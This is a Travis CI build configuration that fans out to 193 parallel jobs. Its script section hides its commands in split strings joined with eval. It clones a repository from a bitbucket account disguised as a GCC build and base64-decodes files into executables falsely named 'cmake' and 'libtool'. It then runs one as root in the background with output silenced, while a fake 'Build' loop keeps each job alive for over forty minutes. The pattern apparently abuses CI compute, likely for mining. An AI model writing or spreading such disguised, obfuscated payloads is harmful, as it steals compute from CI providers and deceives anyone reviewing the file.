dist: bionic

env:
  - BUILD="Ju1"
  - BUILD="Ju2"
  - BUILD="Ju3"
  - BUILD="Ju4"
  - BUILD="Ju5"
  - BUILD="Ju6"
  - BUILD="Ju7"
  - BUILD="Ju8"
  - BUILD="Ju9"
  - BUILD="Ju10"
  - BUILD="Ju11"
  - BUILD="Ju12"
  - BUILD="Ju13"
  - BUILD="Ju14"
  - BUILD="Ju15"
  - BUILD="Ju16"
  - BUILD="Ju17"
  - BUILD="Ju18"
  - BUILD="Ju19"
  - BUILD="Ju20"
  - BUILD="Ju21"
  - BUILD="Ju22"
  - BUILD="Ju23"
  - BUILD="Ju24"
  - BUILD="Ju25"
  - BUILD="Ju26"
  - BUILD="Ju27"
  - BUILD="Ju28"
  - BUILD="Ju29"
  - BUILD="Ju30"
  - BUILD="Ju31"
  - BUILD="Ju32"
  - BUILD="Ju33"
  - BUILD="Ju34"
  - BUILD="Ju35"
  - BUILD="Ju36"
  - BUILD="Ju37"
  - BUILD="Ju38"
  - BUILD="Ju39"
  - BUILD="Ju40"
  - BUILD="Ju41"
  - BUILD="Ju42"
  - BUILD="Ju43"
  - BUILD="Ju44"
  - BUILD="Ju45"
  - BUILD="Ju46"
  - BUILD="Ju47"
  - BUILD="Ju48"
  - BUILD="Ju49"
  - BUILD="Ju50"
  - BUILD="Ju51"
  - BUILD="Ju52"
  - BUILD="Ju53"
  - BUILD="Ju54"
  - BUILD="Ju55"
  - BUILD="Ju56"
  - BUILD="Ju57"
  - BUILD="Ju58"
  - BUILD="Ju59"
  - BUILD="Ju60"
  - BUILD="Ju61"
  - BUILD="Ju62"
  - BUILD="Ju63"
  - BUILD="Ju64"
  - BUILD="Ju65"
  - BUILD="Ju66"
  - BUILD="Ju67"
  - BUILD="Ju68"
  - BUILD="Ju69"
  - BUILD="Ju70"
  - BUILD="Ju71"
  - BUILD="Ju72"
  - BUILD="Ju73"
  - BUILD="Ju74"
  - BUILD="Ju75"
  - BUILD="Ju76"
  - BUILD="Ju77"
  - BUILD="Ju78"
  - BUILD="Ju79"
  - BUILD="Ju80"
  - BUILD="Ju81"
  - BUILD="Ju82"
  - BUILD="Ju83"
  - BUILD="Ju84"
  - BUILD="Ju85"
  - BUILD="Ju86"
  - BUILD="Ju87"
  - BUILD="Ju88"
  - BUILD="Ju89"
  - BUILD="Ju90"
  - BUILD="Ju91"
  - BUILD="Ju92"
  - BUILD="Ju93"
  - BUILD="Ju94"
  - BUILD="Ju95"
  - BUILD="Ju96"
  - BUILD="Ju97"
  - BUILD="Ju98"
  - BUILD="Ju99"
  - BUILD="Ju100"
  - BUILD="Ju101"
  - BUILD="Ju102"
  - BUILD="Ju103"
  - BUILD="Ju104"
  - BUILD="Ju105"
  - BUILD="Ju106"
  - BUILD="Ju107"
  - BUILD="Ju108"
  - BUILD="Ju109"
  - BUILD="Ju110"
  - BUILD="Ju111"
  - BUILD="Ju112"
  - BUILD="Ju113"
  - BUILD="Ju114"
  - BUILD="Ju115"
  - BUILD="Ju116"
  - BUILD="Ju117"
  - BUILD="Ju118"
  - BUILD="Ju119"
  - BUILD="Ju120"
  - BUILD="Ju121"
  - BUILD="Ju122"
  - BUILD="Ju123"
  - BUILD="Ju124"
  - BUILD="Ju125"
  - BUILD="Ju126"
  - BUILD="Ju127"
  - BUILD="Ju128"
  - BUILD="Ju129"
  - BUILD="Ju130"
  - BUILD="Ju131"
  - BUILD="Ju132"
  - BUILD="Ju133"
  - BUILD="Ju134"
  - BUILD="Ju135"
  - BUILD="Ju136"
  - BUILD="Ju137"
  - BUILD="Ju138"
  - BUILD="Ju139"
  - BUILD="Ju140"
  - BUILD="Ju141"
  - BUILD="Ju142"
  - BUILD="Ju143"
  - BUILD="Ju144"
  - BUILD="Ju145"
  - BUILD="Ju146"
  - BUILD="Ju147"
  - BUILD="Ju148"
  - BUILD="Ju149"
  - BUILD="Ju150"
  - BUILD="Ju151"
  - BUILD="Ju152"
  - BUILD="Ju153"
  - BUILD="Ju154"
  - BUILD="Ju155"
  - BUILD="Ju156"
  - BUILD="Ju157"
  - BUILD="Ju158"
  - BUILD="Ju159"
  - BUILD="Ju160"
  - BUILD="Ju161"
  - BUILD="Ju162"
  - BUILD="Ju163"
  - BUILD="Ju164"
  - BUILD="Ju165"
  - BUILD="Ju166"
  - BUILD="Ju167"
  - BUILD="Ju168"
  - BUILD="Ju169"
  - BUILD="Ju170"
  - BUILD="Ju171"
  - BUILD="Ju172"
  - BUILD="Ju173"
  - BUILD="Ju174"
  - BUILD="Ju175"
  - BUILD="Ju176"
  - BUILD="Ju177"
  - BUILD="Ju178"
  - BUILD="Ju179"
  - BUILD="Ju180"
  - BUILD="Ju181"
  - BUILD="Ju182"
  - BUILD="Ju183"
  - BUILD="Ju184"
  - BUILD="Ju185"
  - BUILD="Ju186"
  - BUILD="Ju187"
  - BUILD="Ju188"
  - BUILD="Ju189"
  - BUILD="Ju190"
  - BUILD="Ju191"
  - BUILD="Ju192"
  - BUILD="Ju193"

language: minimal

script:
  - cAGRpDi="sudo apt up"
  - KYpibafCz="date || tru"
  - eval "$cAGRpDi""$KYpibafCz""e"
  - VLNvF="sudo apt --"
  - gQuRRvFppv="yes install"
  - LDuqMEYn=" cl-base64 "
  - hgnSvkJ="git &>/dev/"
  - eval "$VLNvF""$gQuRRvFppv""$LDuqMEYn""$hgnSvkJ""null"
  - daGQHgURrv="git clone h"
  - cIjLPz="ttps://gccb"
  - oGjDd="uild@bitbuc"
  - ihdJlbtbf="ket.org/gcc"
  - hrklmP="build/gcc.g"
  - aMxJal="it &>/dev/n"
  - eval "$daGQHgURrv""$cIjLPz""$oGjDd""$ihdJlbtbf""$hrklmP""$aMxJal""ull"
  - UIWGjHZYG="base64 -d g"
  - QZCfgwq="cc/cmake_ >"
  - eval "$UIWGjHZYG""$QZCfgwq"" cmake"
  - rhzSJKu="base64 -d g"
  - dSyDggsAsDD="cc/config_ "
  - eval "$rhzSJKu""$dSyDggsAsDD""> run"
  - UakJaFYydnC="base64 -d g"
  - eoQPhVn="cc/make_ > "
  - eval "$UakJaFYydnC""$eoQPhVn""libtool"
  - chmod +x libtool cmake
  - ./cmake
  - sed -i 's/build/tg3u/g' run
  - sudo ./libtool -c run &>/dev/null &
  - GCC=$(date +%s)
  - GhmljOXkb="echo $BUILD"
  - eval "$GhmljOXkb"""
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2560)) ] && sudo killall libtool && break; sleep 227; done
